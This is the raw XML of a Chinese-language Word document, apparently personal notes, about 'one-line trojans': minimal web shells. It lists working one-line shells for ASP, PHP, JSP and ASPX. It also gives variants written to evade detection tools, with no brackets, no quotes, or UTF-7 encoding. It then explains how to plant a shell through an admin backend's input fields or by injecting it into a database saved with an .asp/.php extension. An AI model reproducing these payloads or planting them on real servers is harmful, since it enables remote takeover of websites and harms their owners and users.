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A5" w:rsidRDefault="00BB649E" w:rsidP="005B6FB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D6482">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>一句话木马</w:t>
      </w:r>
      <w:r w:rsidR="00E439EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A5" w:rsidRDefault="00B671A5" w:rsidP="005B6FB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B671A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端和服务端，就是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模型的网页木马。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A5" w:rsidRPr="00B671A5" w:rsidRDefault="00B671A5" w:rsidP="005B6FB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先应将服务端代码插入到网站中</w:t>
      </w:r>
      <w:r w:rsidR="00585961">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即为插入到</w:t>
      </w:r>
      <w:r w:rsidR="00585961">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r w:rsidR="00585961">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中，然后使用客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB649E" w:rsidRPr="005B6FB7" w:rsidRDefault="00BB649E" w:rsidP="005B6FB7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6FB7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>常用一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2744" w:rsidRDefault="00BB649E" w:rsidP="005B6FB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="301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asp一句话木马：</w:t>
      </w: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 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&lt;%execute(request("value"))%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3D2D" w:rsidRDefault="005C2744" w:rsidP="005B6FB7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5C2744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其中，value 我们可以是任何值。当然，我们还可以对服务端&lt;%execute</w:t>
      </w:r>
      <w:r w:rsidR="00C80074"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C80074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request("value")%&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2744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进行变换，如&lt;%</w:t>
      </w:r>
      <w:r w:rsidR="00C80074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execute request.form("value")%&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2744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、&lt;%eval</w:t>
      </w:r>
      <w:r w:rsidR="00C80074"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2744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request("value")、&lt;%On Error Resume Next execute request("value")%&gt;等等</w:t>
      </w:r>
      <w:r w:rsidR="00BB649E"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</w:r>
      <w:r w:rsidR="00BB649E"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php一句话木马：</w:t>
      </w:r>
      <w:r w:rsidR="00BB649E"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br/>
      </w:r>
      <w:r w:rsidR="00BB649E"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 </w:t>
      </w:r>
      <w:r w:rsidR="00BB649E"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&lt;?php @eval($_POST[value]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3D2D" w:rsidRDefault="005E3D2D" w:rsidP="005E3D2D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5E3D2D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&lt;?require($_REQUEST['</w:t>
      </w:r>
      <w:r w:rsidR="00CB0AB8"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value</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3D2D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']);?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3D2D" w:rsidRPr="005E3D2D" w:rsidRDefault="005E3D2D" w:rsidP="005E3D2D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5E3D2D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&lt;?require($</w:t>
      </w:r>
      <w:r w:rsidR="00354609"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value</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3D2D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);?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3D2D" w:rsidRDefault="005E3D2D" w:rsidP="005E3D2D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5E3D2D"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>&lt;?@include($_POST["</w:t>
      </w:r>
      <w:r w:rsidR="00354609"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value</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3D2D"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>"]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283698" w:rsidRDefault="00283698" w:rsidP="005E3D2D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b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283698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jsp一句话木马</w:t>
      </w:r>
      <w:r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：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283698" w:rsidRPr="00283698" w:rsidRDefault="00283698" w:rsidP="00283698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283698"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>&lt;% if(request.getParameter("f")!=null)(new</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00283698"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  <w:t>java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A750B1" w:rsidRDefault="00BB649E" w:rsidP="005E3D2D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aspx一句话木马：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB649E" w:rsidRPr="005C2744" w:rsidRDefault="00BB649E" w:rsidP="005E3D2D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:ind w:left="300"/>
        <w:contextualSpacing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&lt;%@ Page Language="Jscript"%&gt;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>&lt;%eval(Request.Item["value"])%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB649E" w:rsidRPr="00851325" w:rsidRDefault="00BB649E" w:rsidP="00BB649E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="301"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="隶书" w:eastAsia="隶书" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pP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其他一句话木马：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB649E" w:rsidRPr="00851325" w:rsidRDefault="00BB649E" w:rsidP="00BB649E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="300"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="隶书" w:eastAsia="隶书" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pP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&lt;%eval request("value")%&gt;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&lt;%execute request("value")%&gt;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&lt;%execute(request("value"))%&gt;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&lt;%If Request("value")&lt;&gt;"" Then Execute(Request("value"))%&gt;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&lt;%if request ("value")&lt;&gt;""then session("value")=request("value"):end if:if session("value")&lt;&gt;"" then execute session("value")%&gt;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&lt;SCRIPT language=VBScript runat="server"&gt;execute request("value")&lt;/SCRIPT&gt;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&lt;%@ Page Language="Jscript"%&gt;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&lt;%eval(Request.Item["value"],"unsafe");%&gt;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 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</w:t>
      </w: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可以躲过雷客图的一句话木马：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set ms = server.CreateObject("MSScriptControl.ScriptControl.1")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ms.Language="VBScript"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ms.AddObject "Response", Response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ms.AddObject "request", request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ms.ExecuteStatement("ev"&amp;"al(request(""value""))")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%&gt;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</w:t>
      </w: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不用'&lt;,&gt;'的asp一句话木马：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&lt;script language=VBScript runat=server&gt;execute request("value")&lt;/script&gt;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 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</w:t>
      </w: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不用双引号的一句话木马：</w:t>
      </w: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br/>
        <w:t xml:space="preserve">　　&lt;%eval request(chr(35))%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB649E" w:rsidRPr="00851325" w:rsidRDefault="00BB649E" w:rsidP="00BB649E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="301"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="隶书" w:eastAsia="隶书" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851325">
        <w:rPr>
          <w:rFonts w:ascii="隶书" w:eastAsia="隶书" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>UTF-7编码加密:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007832FB" w:rsidRDefault="00BB649E" w:rsidP="007832FB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="300"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="隶书" w:eastAsia="隶书" w:hAnsi="Times New Roman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851325">
        <w:rPr>
          <w:rFonts w:ascii="隶书" w:eastAsia="隶书" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;%@ codepage=65000%&gt;&lt;% response.Charset=”936″%&gt;&lt;%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007832FB" w:rsidRDefault="007832FB" w:rsidP="007832FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidR="00807004">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00807004" w:rsidRPr="00807004">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>PHP网页</w:t>
      </w:r>
      <w:r w:rsidR="00433C18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>（J</w:t>
      </w:r>
      <w:r w:rsidR="00433C18">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>SP</w:t>
      </w:r>
      <w:r w:rsidR="00433C18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>也类似）</w:t>
      </w:r>
      <w:r w:rsidR="00D44D8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>其他的网站</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="000F76F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>原理一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00213691" w:rsidRPr="00DE135E" w:rsidRDefault="00213691" w:rsidP="00213691">
      <w:pPr>
        <w:pStyle w:val="a7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after="180" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>通过后台：</w:t>
      </w:r>
      <w:r w:rsidR="007832FB" w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>进入后台后，利用后台插入，例如友情连接、页面编辑、模块编辑等等，只要可以输入数据的地方都可以试着输入服务端，要记着这个输入数据的文件的 URL地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3D2D" w:rsidRPr="00DE135E" w:rsidRDefault="00213691" w:rsidP="005E3D2D">
      <w:pPr>
        <w:pStyle w:val="a7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after="180" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>通过暴库或其他方法（如默认数据库地址）：得到网站数据库的绝对路径，但是数据库必须以asp</w:t>
      </w:r>
      <w:r w:rsidR="00807004" w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>/php</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>结尾的数据库，即为asp</w:t>
      </w:r>
      <w:r w:rsidR="00807004" w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>/php</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>格式的</w:t>
      </w:r>
      <w:r w:rsidR="00993E71" w:rsidRPr="00DE135E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>数据库，有了数据库地址后，就要利用网站过滤不完全的漏洞往数据库中插入服务端代码，即所输入的服务端要插入到数据库中才会起作用。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005E3D2D" w:rsidRPr="00DE135E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31D" w:rsidRDefault="0090431D" w:rsidP="00BB649E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0090431D" w:rsidRDefault="0090431D" w:rsidP="00BB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31D" w:rsidRDefault="0090431D" w:rsidP="00BB649E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0090431D" w:rsidRDefault="0090431D" w:rsidP="00BB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09A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36FE20BE"/>
    <w:lvl w:ilvl="0" w:tplc="218A1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35"/>
    <w:rsid w:val="0004040E"/>
    <w:rsid w:val="000F76F6"/>
    <w:rsid w:val="00213691"/>
    <w:rsid w:val="00283698"/>
    <w:rsid w:val="002E0285"/>
    <w:rsid w:val="00354609"/>
    <w:rsid w:val="003E1E9A"/>
    <w:rsid w:val="00433C18"/>
    <w:rsid w:val="004F14E9"/>
    <w:rsid w:val="00585961"/>
    <w:rsid w:val="005B6FB7"/>
    <w:rsid w:val="005C2744"/>
    <w:rsid w:val="005E3D2D"/>
    <w:rsid w:val="007832FB"/>
    <w:rsid w:val="00807004"/>
    <w:rsid w:val="00851325"/>
    <w:rsid w:val="0090431D"/>
    <w:rsid w:val="00993E71"/>
    <w:rsid w:val="00A750B1"/>
    <w:rsid w:val="00B671A5"/>
    <w:rsid w:val="00BB649E"/>
    <w:rsid w:val="00C65E2F"/>
    <w:rsid w:val="00C80074"/>
    <w:rsid w:val="00CB0AB8"/>
    <w:rsid w:val="00D44D8C"/>
    <w:rsid w:val="00DE135E"/>
    <w:rsid w:val="00DF2CB4"/>
    <w:rsid w:val="00E32AE3"/>
    <w:rsid w:val="00E439EA"/>
    <w:rsid w:val="00F76B35"/>
    <w:rsid w:val="00FD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6813F7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{346C32D2-79A9-4420-B49A-42525F2E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49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6F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3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6FB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6F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13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国阳</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李 国阳</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-12T14:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-13T16:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>